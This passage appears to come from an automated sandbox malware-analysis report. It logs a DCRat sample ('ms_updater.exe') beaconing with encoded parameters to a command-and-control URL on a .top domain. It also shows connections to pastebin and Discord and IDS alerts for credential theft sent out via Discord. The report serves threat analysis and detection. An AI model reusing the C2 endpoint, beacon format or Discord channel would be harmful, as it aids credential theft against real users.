keO1mUX1UNN1WT000RNpmVE1kaoRVWzkkeNVTWtpFMjpnTsZFROFza6lleJ1WW4l0QMlGNrlkNJNlT5F1VapmTt1EMFRVW4VlaOlmT610MrRVTyMGVPlmWq5kMZRVWtJ1VPJTVtpVbaRVW0U1VNl2dpl0LJl2TpFERPtmVEp1aCRVT3lEVORzaUplaGdkWzk1RNxGaUpFaGRVW6NmeNJzZqplMRR1T4FlMOdXRql0NwpWSoJFWZVkUIVGbKNETx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSspFWhBjTXFVavpWS6ZFSkhmUzUVNShVYyw2RkpmRrl0cJl2YsR2VZVnRXR1ZwcVW5RmMilnQslkNJlHZ2JVbiBHZGZFRGtWSzlUaUl2bqlEdGJTWpZlMWpHbtl0cJN1Vp9maJxWNyI2bCNjY550Vh5kTYFWa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFTUpdXaJBHNyQmd1ITY1ZlRLdGNyQmd1ITY1ZFbJZTSTpFdG1GVWJUMSl2dplkWKl2TpRzVhRnUXFles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlUeNRUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlmYwhXbjxmSwwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVZ1Z0VilnVyI1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWTE5ENZpGT0c3QPRTRU1UdBRlTp9maJpWOHJWa3lWSGJ1aJZTSTVWeS5mYxkjMZl2dplEbONzYsh2aJZTSpJmdsJjWspkbJNXSpJGcGdFVnBzVZdWUuNWMaJTY1ZUbjdkSp9UarhEZw5UbJNXSp50dFpGT0ElaMNTRqxEMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIWY3MjM4YDNlhzNyYjYlNWYmBjYjRDO5QzYiNDOykTNiwiI0ETZ2kTOyEGZzczNkBzM1QmZ4ETOlNWMzgTMxAjNmdjNiVGMwUWYzIiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W | unknown | text | 104 b | unknown |
848 | ms_updater.exe | GET | 200 | 188.114.96.3:80 | http://355212cm.nyashnyash.top/nyashsupport.php?VChnrne0pWN6OUvbyLx=2fpnK3MdUTBHs9KC1JD&8Kp0YJjcTuh6rHq0W3cyb=gW&GNOKtkoHImsz=PBTtKkvEZkSUp7qPN7oSeS6VSk&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyQzN2YjN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nIlZDOkFTNiZGNwMTOlFjYkljM4IDNlFjN2UDMwUWOlVzYlZWOkFmYlJiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W | unknown | text | 108 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 224.0.0.252:5355 | — | — | — | unknown |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
848 | ms_updater.exe | 104.20.68.143:443 | pastebin.com | CLOUDFLARENET | — | unknown |
848 | ms_updater.exe | 188.114.96.3:80 | 355212cm.nyashnyash.top | CLOUDFLARENET | NL | unknown |
1596 | RtkBtManServ.exe | 162.159.135.233:443 | discordapp.com | CLOUDFLARENET | — | unknown |
— | — | 162.159.135.233:443 | discordapp.com | CLOUDFLARENET | — | unknown |
Domain | IP | Reputation |
|---|---|---|
pastebin.com |
| shared |
355212cm.nyashnyash.top |
| unknown |
discordapp.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
1080 | svchost.exe | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
848 | ms_updater.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
848 | ms_updater.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
1080 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discordapp .com) |
1596 | RtkBtManServ.exe | Misc activity | ET INFO Observed Discord Domain (discordapp .com in TLS SNI) |
1596 | RtkBtManServ.exe | Successful Credential Theft Detected | STEALER [ANY.RUN] Attempt to exfiltrate via Discord |
1596 | RtkBtManServ.exe | Misc activity | ET INFO Observed Discord Domain (discordapp .com in TLS SNI) |
1596 | RtkBtManServ.exe | Successful Credential Theft Detected | STEALER [ANY.RUN] Attempt to exfiltrate via Discord |
— | — | Misc activity | ET INFO Observed Discord Domain (discordapp .com in TLS SNI) |
— | — | Successful Credential Theft Detected | STEALER [ANY.RUN] Attempt to exfiltrate via Discord |